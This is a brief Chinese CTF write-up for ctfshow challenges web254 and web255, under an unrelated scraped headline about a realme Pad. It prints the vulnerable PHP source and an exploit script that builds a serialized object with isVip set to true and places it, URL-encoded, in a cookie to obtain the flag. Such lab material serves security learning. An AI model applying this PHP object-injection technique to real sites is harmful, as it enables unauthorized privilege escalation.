1. 程式人生 > 資訊 >realme Pad 實拍圖曝光,將在印度釋出

realme Pad 實拍圖曝光,將在印度釋出

web254

直接get傳參就行了

username=xxxxxx&password=xxxxx

web255

拿到程式碼

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: [email protected]
# @link: https://ctfer.com

*/

error_reporting(0);
highlight_file
(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ return $this->username===$u&&$this->password===$p
; } public function vipOneKeyGetFlag(){ if($this->isVip){ global $flag; echo "your flag is ".$flag; }else{ echo "no vip, no flag"; } } } $username=$_GET['username']; $password=$_GET['password']; if(isset($username) && isset
($password)){ $user = unserialize($_COOKIE['user']); if($user->login($username,$password)){ if($user->checkVip()){ $user->vipOneKeyGetFlag(); } }else{ echo "no vip,no flag"; } }

首先get傳參,進入第一個if語句,接著對cookie值進行了反序列化,在cookie中構造序列化

exp

<?php
class ctfShowUser
{
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
    public $isVip = true;
}
$a = new ctfShowUser();
$b = urlencode(serialize($a));
echo $b;

?>

需要特別注意的是在cookie欄位當中需要url編碼一波)(其名稱以及儲存的字串值是必須經過URL編碼的)